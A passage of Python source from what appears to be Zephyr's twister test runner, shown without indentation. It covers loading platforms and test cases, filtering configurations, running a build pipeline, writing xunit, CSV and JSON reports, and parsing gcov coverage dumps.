self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
self.modules = []
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
for instance in self.instances.values():
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_filter += 1
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report, report_skipped):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version, report_skipped=report_skipped)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version, report_skipped=report_skipped)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.modules = tc_dict["modules"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
of all tests configurations (platform + scenario: comment) that shall be
skipped due to quarantine
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if "run_id" in row and row["run_id"] != "na":
instance.run_id = row["run_id"]
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
self.verify_platforms_existence(platform_filter, f"platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
self.verify_platforms_existence(
tc.integration_platforms, f"{tc_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and tc.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if tc.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
tc.platform_allow, f"{tc_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \
self.platforms))
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if tc.modules and self.modules:
if not set(tc.modules).issubset(set(self.modules)):
discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(tc.modules)}")
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testcase.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testcase.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
instance.fill_results_by_status()
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
# Remove from discards configurations that must not be discarded (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
for instance in self.instances.values():
if build_only:
instance.run = False
no_retry_statuses = ['passed', 'skipped']
if not retry_build_errors:
no_retry_statuses.append("error")
if instance.status not in no_retry_statuses:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors,
suite_name_check=self.suite_name_check
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
retry_build_errors=self.retry_build_errors)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False, report_skipped=True):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version, report_skipped=report_skipped)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA", report_skipped=True):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
eleTestsuite = None
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
else:
logger.info(f"Did not find any existing results for {p}")
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
if not eleTestsuite or not eleTestsuite.findall(f'testcase/[@name="{k}"]'):
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
if not report_skipped and total == skips:
continue
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if eleTestsuite:
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % (skips + int(eleTestsuite.attrib['skipped']))
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
for _, instance in inst.items():
if instance.status == 'skipped' and not report_skipped:
continue
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message=instance.reason)
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout", "flash_error"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size", "run_id"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
try:
rowdict["run_id"] = instance.run_id
except AttributeError:
# No run_id available
rowdict["run_id"] = "na"
cw.writerow(rowdict)
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
for k in instance.results.keys():
testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases ))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
if instance.results[k] in ["SKIP"] or instance.status == 'skipped':
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
elif instance.results[k] in ["PASS"] or instance.status == 'passed':
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout", "flash_error"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
Verify if platform name (passed by --platform option, or in yaml file
as platform_allow or integration_platforms options) is correct. If not -
log and raise error.
"""
for platform in platform_names_to_verify:
if platform in self.platform_names:
break
else:
logger.error(f"{log_info} - unrecognized platform - {platform}")
sys.exit(2)
def create_build_dir_links(self):
"""
Iterate through all no-skipped instances in suite and create links
for each one build directories. Those links will be passed in the next
steps to the CMake command.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
Create build directory with original "long" path. Next take shorter
path and link them with original path - create link. At the end
replace build_dir to created link. This link will be passed to CMake
command. This action helps to limit path length which can be
significant during building by CMake on Windows OS.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
